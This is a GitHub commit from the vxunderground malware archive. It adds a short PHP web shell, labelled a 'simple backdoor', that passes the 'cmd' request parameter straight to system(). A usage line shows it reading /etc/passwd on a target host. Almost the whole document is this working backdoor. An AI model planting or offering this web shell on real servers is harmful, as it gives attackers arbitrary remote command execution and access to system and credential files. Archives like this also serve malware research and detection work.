Add files via upload

This commit is contained in:
vxunderground
2020-10-09 22:05:41 -05:00
committed by GitHub
parent 27f87bc75b
commit 23c136b0eb
96 changed files with 23882 additions and 0 deletions
+17
View File
@@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->